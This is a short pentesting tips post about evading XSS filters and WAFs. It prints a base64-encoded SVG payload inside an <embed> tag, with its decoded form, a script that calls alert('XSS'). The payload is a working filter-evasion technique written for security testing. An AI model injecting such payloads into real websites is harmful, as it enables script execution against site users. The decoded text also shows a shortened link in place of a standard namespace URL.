Week 1 - XSS Filter Evasion
Advanced XSS using <embed>
To start off the new year, I’ll be kicking off a series of posts containing Web App Hacking Tips & Tricks. This week’s tip is related to Advanced Cross-Site Scripting:
Several times in the past, I’ve found myself testing a website that allows HTML Injection, but I can’t seem to get a working XSS payload or pop an alert box. Typically, the application has some kind of WAF running that blocks specific HTML tags (script, img, a) or more commonly HTML events (onclick, onerror, onpageshow). In these situations, I’ve found the below payload successfully executes:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
The above base64 decodes to:
<svg xmlns:svg="
http://www.w3.org/2000/svg
" xmlns="
http://www.w3.org/2000/svg
" xmlns:xlink="
https://lnkd.in/ePggbfMN
" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert("XSS");</script></svg>
Because this payload doesn’t contain HTML events and uses the uncommon <embed> tag, it is a useful addition to your pentesting notes
Last updated